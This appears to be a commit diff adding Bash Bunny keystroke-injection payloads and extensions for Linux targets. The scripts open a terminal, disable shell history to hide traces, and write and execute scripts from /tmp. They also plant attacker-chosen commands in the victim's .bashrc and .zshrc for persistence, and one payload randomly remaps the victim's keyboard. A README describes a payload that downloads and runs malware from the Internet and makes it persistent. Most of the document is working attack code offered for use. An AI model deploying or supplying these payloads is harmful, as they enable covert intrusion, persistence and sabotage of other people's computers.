uploading payloads and extensions

payloads/extensions/browser_exec.sh

@@ -0,0 +1,24 @@
+#!/bin/bash
+
+# BROWSER_EXEC v1 by @drapl0n
+# BROWSER_EXEC finds browser installed in target's system and searche for URL in it.
+# Usage: BROWSER_EXEC <URL>
+
+function BROWSER_EXEC(){
+	LED ATTACK
+	Q DELAY 1000
+	Q CTRL-ALT t
+	Q DELAY 1000
+	Q STRING unset HISTFILE
+	Q ENTER
+	Q DELAY 200
+	Q STRING echo -e "\"#\!/bin/bash\nfunction browser(){\n\tbrowser=\\\$(ls /bin/ | grep -Ew 'firefox|chromium|brave'| head -1)\n\tif [ \\\"\\\$browser\\\" = firefox ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --private-window)\n\t\texport execBrowser\n\telif [ \\\"\\\$browser\\\" = chromium ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --incognito)\n\t\texport execBrowser\n\telif [ \\\"\\\$browser\\\" = brave ]; then\n\t\texecBrowser=\\\$(echo \\\$browser --incognito)\n\t\texport execBrowser\n\telse\n\t\techo \\\"Browser not found.\\\"\n\tfi\n}\nbrowser\n\\\$execBrowser $1 "\" \> /tmp/sys
+	Q ENTER
+	Q DELAY 200
+	Q STRING chmod +x /tmp/sys
+	Q ENTER
+	Q DELAY 200
+	Q STRING /tmp/./sys \& disown \&\& exit
+	Q ENTER
+} 
+export -f BROWSER_EXEC $1

payloads/extensions/capslock_disable.sh

@@ -0,0 +1,16 @@
+#!/bin/sh
+#
+# CAPSLOCK_DISABLE v1 by @drapl0n
+# Disables CapsLock on target's system.
+# Usage: CAPSLOCK_DISABLE ----------------------------(to disable CAPSLOCK on target's system.)
+
+function CAPSLOCK_DISABLE() {
+	Q DELAY 200
+	Q CTRL-ALT t
+	Q DELAY 1000
+	Q STRING setxkbmap -option ctrl:nocaps \&\& exit
+	Q ENTER
+	Q DELAY 200
+}
+
+export -f CAPSLOCK_DISABLE

payloads/extensions/shell_trigger.sh

@@ -0,0 +1,23 @@
+#!/bin/bash
+
+# SHELL_TRIGGER v1 by @drapl0n
+# SHELL_TRIGGER triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
+# Usage: SHELL_TRIGGER <COMMAND/SCRIPT>
+function SHELL_TRIGGER(){
+	LED ATTACK
+	Q DELAY 1000
+	Q CTRL-ALT t
+	Q DELAY 1000
+	Q STRING unset HISTFILE
+	Q ENTER
+	Q DELAY 200
+	Q STRING echo -e "\"ls -a ~/ | grep 'zshrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \\\"$1\\\" >> ~/.zshrc\\\nfi\\\n\\\nls -a ~/ | grep 'bashrc' &> /dev/null\\\nif [ \\\$? = 0 ]; then\\\n\\\techo \\\"$1\\\" >> ~/.bashrc\\\nfi"\" \> /tmp/sys
+	Q ENTER
+	Q DELAY 200
+	Q STRING chmod +x /tmp/sys
+	Q ENTER
+	Q DELAY 200
+	Q STRING /tmp/./sys
+	Q ENTER
+} 
+export -f SHELL_TRIGGER $1

payloads/library/execution/BROWSER_EXEC_DEMO/README.md

@@ -0,0 +1,33 @@
+## About:
+# Title: BROWSER_EXEC_DEMO
+# Description: BROWSER_EXEC_DEMO finds browser installed in target's system and searche URL in it.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: Unix-like operating systems.
+# Attackmodes: HID
+
+## BROWSER_EXEC_DEMO: A payload which finds installed browser in target's system and searche URL in it. This payload can be used as a module to craft a new payload which requires browser execution in it.
+
+### Workflow:
+1. Executing Terminal Emulator.
+2. Prevent storing history.
+3. Storing script in target's system.
+4. Granting execution privilege.
+5. Executing script in background.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Directory Structure of payload components:
+| FileName       | Directory                       |
+| -------------- | --------------------------------|
+| payload.txt    | /payloads/switch1/              |
+
+### Changes to be done:
+* Replace URL on line `27` to the URL which you want your target system to visit. 
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n 

payloads/library/execution/BROWSER_EXEC_DEMO/payload.txt

@@ -0,0 +1,29 @@
+# Title: BROWSER_EXEC_DEMO
+# Description: This payload demonstrates functioning of extension BROWSER_EXEC which finds browsers installed in target's system and searches URL in it.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: Unix-like operating systems.
+# Attackmodes: HID
+
+# [Setting up Bunny]
+LED SETUP
+ATTACKMODE HID
+
+# [Launching Terminal Emulator]
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Executing Main Payload]
+
+# [Note: Replace URL below to the URL which you want your target system to visit.]
+BROWSER_EXEC hak5.org
+
+LED FINISH

payloads/library/execution/CAPSLOCK_DISABLE_DEMO/README.md

@@ -0,0 +1,19 @@
+## About
+# Title: CAPSLOCK_DISABLE_DEMO
+# Description: CAPSLOCK_DISABLES_DEMO disables capslock on target's system.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux.
+# Attackmodes: HID.
+
+## CAPSLOCK_DISABLES_DEMO: CAPSLOCK_DISABLES_DEMO disables capslock on target's system. Can be used as module to craft payloads which requires long time to execute.
+
+### Workflow:
+1. Executing Terminal Emulator.
+2. Prevent storing history.
+3. Executing command which disables capslock.
+4. Terminating terminal instance.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n 

payloads/library/execution/CAPSLOCK_DISABLE_DEMO/payload.txt

@@ -0,0 +1,23 @@
+# Title: CAPSLOCK_DISABLE_DEMO
+# Description: Demonstration of CAPSLOCK_DISABLE extension.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux.
+# Attackmodes: HID.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Calling Extension]
+CAPSLOCK_DISABLE

payloads/library/execution/SHELL_TRIGGER_DEMO/README.md

@@ -0,0 +1,33 @@
+## About:
+# Title: SHELL_TRIGGER_DEMO
+# Description: SHELL_TRIGGER_DEMO payload demonstrates working of SHELL_TRIGGER extension.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: Unix-like operating systems.
+# Attackmodes: HID
+
+## SHELL_TRIGGER: SHELL_TRIGGER is an extension which triggers commands/scripts on shell execution on target's system OR triggers commands/scripts when target executes terminal emulator.
+
+### Workflow:
+1. Executing Terminal Emulator.
+2. Prevent storing history.
+3. Storing script in target's system.
+4. Granting execution privilege.
+5. Executing script in background.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Directory Structure of payload components:
+| FileName       | Directory                       |
+| -------------- | --------------------------------|
+| payload.txt    | /payloads/switch1/              |
+
+### Changes to be made:
+* Replace command on line `7` to the command/script which you want your target system to execute on shell execution.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n 

payloads/library/execution/SHELL_TRIGGER_DEMO/payload.txt

@@ -0,0 +1,29 @@
+# Title: SHELL_TRIGGER_DEMO
+# Description: This payload demonstrates working of SHELL_TRIGGER extension.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: Unix-like operating systems.
+# Attackmodes: HID
+
+# [Setting up Bunny]
+LED SETUP
+ATTACKMODE HID
+
+# [Launching Terminal Emulator]
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Executing Main Payload]
+
+# [Note: Replace command below to the command/script which you want your target system to execute on shell execution.]
+SHELL_TRIGGER "echo SHELL_TRIGGER extension DEMO"
+
+LED FINISH

payloads/library/execution/keyboard_hangover/README.md

@@ -0,0 +1,34 @@
+## About:
+* Title: keyboard_hangover
+* Description: keyboard_hangover is a powerful payload which randomly remaps target's keyboard.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution.
+* Target: Unix-like operating systems.
+* Attackmodes: HID, Storage.
+
+## keyboard_hangover: keyboard_hangover is a powerful payload which randomly remaps target's keyboard and and auto-triggers it.
+
+### Features:
+1. Randomly remaps keyboard.
+2. Auto-Triggers on shell execution.
+3. Persistent payload.
+4. Fast execution.
+
+### Workflow:
+1. Prevent storing history.
+2. Fetching BashBunny's block device.
+3. Mounting BashBunny.
+4. Executing Payload Script.
+5. Unmounting BashBunny.
+
+### Directory Structure of payload components:
+| FileName       | Directory                             |
+| -------------- | --------------------------------------|
+| payload.txt    | /payloads/switch1/                    |
+| payload.sh     | /payloads/library/keyboard_hangover/  |
+
+* Note: Create directory named `keyboard_hangover` in `/payloads/library/`
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n 

payloads/library/execution/keyboard_hangover/payload.sh

@@ -0,0 +1,24 @@
+#!/bin/bash
+
+mapping_file="/var/tmp/sys"
+
+keycodes=($(seq 8 255))
+characters=($(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 1 | head -n ${#keycodes[@]}))
+
+mapping_content=""
+for ((i=0; i<${#keycodes[@]}; i++)); do
+    keycode=${keycodes[i]}
+    char=${characters[i]}
+    mapping_content+="keycode $keycode = $char\n"
+done
+
+echo -e $mapping_content > $mapping_file
+
+ls -a ~/ | grep 'zshrc' &> /dev/null
+if [ $? = 0 ]; then
+        echo "xmodmap /var/tmp/sys" >> ~/.zshrc
+fi
+ls -a ~/ | grep 'bashrc' &> /dev/null
+if [ $? = 0 ]; then
+        echo "xmodmap /var/tmp/sys" >> ~/.bashrc
+fi

payloads/library/execution/keyboard_hangover/payload.txt

@@ -0,0 +1,53 @@
+# Title: keyboard_hangover
+# Description: keyboard_hangover is a powerful payload which randomly remaps targets keyboard.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution.
+# Target: GNU/Linux.
+# Attackmodes: HID.
+
+LED SETUP
+ATTACKMODE STORAGE
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk'
+Q ENTER
+Q DELAY 2000
+Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$lmnt'/payloads/library/keyboard_hangover/payload.sh /tmp/system
+Q ENTER
+Q STRING chmod +x /tmp/system
+Q ENTER
+Q STRING /tmp/./system
+Q ENTER
+Q DELAY 300
+Q STRING rm /tmp/system
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+#Q STRING exit
+Q ENTER
+LED FINISH

payloads/library/execution/malware_exec/README.md

@@ -0,0 +1,45 @@
+## About:
+* Title: malware_exec
+* Description: malware_exec fetches malware hosted on Internet and executes it on targets system.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Exfiltaration
+* Target: Unix-like operating systems .
+* Attackmodes: HID, Storage
+
+## malware_exec: malware_exec fetches malware hosted on Internet and executes it on targets system making it autorun on shell execution and persistent without root privileges.
+
+### Features:
+
+* Executes Malware.
+* Trigger malware on shell execution/autorun malware on shell execution.
+* Persistent Malware.
+* No root privileges required.
+
+### Workflow:
+1. Prevent storing history.
+2. Fetching BashBunny's block device.
+3. Mounting BashBunny.
+4. Executing Malware.
+5. Making malware autorun and persistent (optional).
+5. Unmounting BashBunny.
+
+### Usage:
+* Change Testing URL on line `36` to your custom URL.
+* Uncomment line `46` to `56` to make malware persistent and autorun it on shell execution.
+
+### LED Status:
+* `SETUP`   : MAGENTA
+* `ATTACK`  : YELLOW
+* `FINISH`  : GREEN
+
+### Directory Structure of payload components:
+| FileName       | Directory                       |
+| -------------- | --------------------------------|
+| payload.txt    | /payloads/switch1/              |
+| payload.sh     | /payloads/library/malware_exec/ |
+
+* Note: Create directory named `malware_exec` in `/payloads/library/`
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n